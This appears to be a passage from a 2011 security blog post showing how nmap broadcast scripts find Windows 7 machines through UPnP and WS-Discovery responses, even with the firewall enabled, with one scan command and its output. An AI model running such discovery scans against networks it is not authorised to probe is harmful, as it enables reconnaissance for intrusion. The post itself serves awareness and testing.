<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OgL0R5qapCt1NSE5qXvRhrJLVkJHT_YlxoLC6y7xDTWpJao3RtG5Xlhxw5TgluAlUTSzCTSREgdb79Cw72zyHVAASrb3ld_Jg-DmXWwJ6ionNv3PFoXPp6I2GVXC3S7CQ3EtSI1yKlg/s1600/nsebroadcast2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OgL0R5qapCt1NSE5qXvRhrJLVkJHT_YlxoLC6y7xDTWpJao3RtG5Xlhxw5TgluAlUTSzCTSREgdb79Cw72zyHVAASrb3ld_Jg-DmXWwJ6ionNv3PFoXPp6I2GVXC3S7CQ3EtSI1yKlg/s400/nsebroadcast2.png" width="400" /></a></div><br />
This shows Universal Plug and Play running on a couple of systems which lets us know of their existence. As you can see from a wireshark capture, this is not a passive scan, but is low bandwidth:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4xebgLDxhsWX0ltSPKlt8D5kKW-Kh9AZkOvwJ50qkIq8EKrs0c5a7ie7tEMWLSRtCkHSGcoQA_6ecVm04GnST2awzTgrq1D601XYJBk0-S6EBjI_Og0TV80U3rX1LtcvywV_nRKvukjo/s1600/nsebroadcast.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4xebgLDxhsWX0ltSPKlt8D5kKW-Kh9AZkOvwJ50qkIq8EKrs0c5a7ie7tEMWLSRtCkHSGcoQA_6ecVm04GnST2awzTgrq1D601XYJBk0-S6EBjI_Og0TV80U3rX1LtcvywV_nRKvukjo/s400/nsebroadcast.png" width="400" /></a></div><br />
<br />
Here is another example with Web Services Dynamic Discovery responding (this is another Windows 7 system on my test network).<br />
<br />
nmap -P0 --script=broadcast<br />
<br />
Starting Nmap 5.51 ( http://nmap.org ) at 2011-05-18 05:23 EDT<br />
Pre-scan script results:<br />
| broadcast-wsdd-discover:<br />
| Devices<br />
| 192.168.1.70<br />
| Message id: c6cf6b9b-834d-4320-85e1-e1a65299ee2f<br />
| Address: http://192.168.1.70:5357/9a36912c-3560-493e-82d7-eadd95271272/<br />
|_ Type: Device pub:Computer<br />
WARNING: No targets were specified, so 0 hosts scanned.<br />
Nmap done: 0 IP addresses (0 hosts up) scanned in 40.08 seconds<br />
<div><br />
<br />
<b>The responses</b><br />
<br />
So these responses for the target systems are basically telling us their IP address (in this case with its IPv4 address) the fact that the system has a HTTP service, and a service it might be running. Basically, following the broadcast, these systems are contacting the attacker to the him their addresses.<br />
<br />
In both these cases Windows 7 has the firewall <b><u>enabled</u></b> (with default "secure" settings, so you be the judge of whether this is a good default behavior or not).<br />
<br />
So, in short, I think we will be hearing a lot more about broadcast-based service scans, (and also passive data collection) as IPv6 rolls out in corporate infrastructure.<br />
<br />
</div>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com7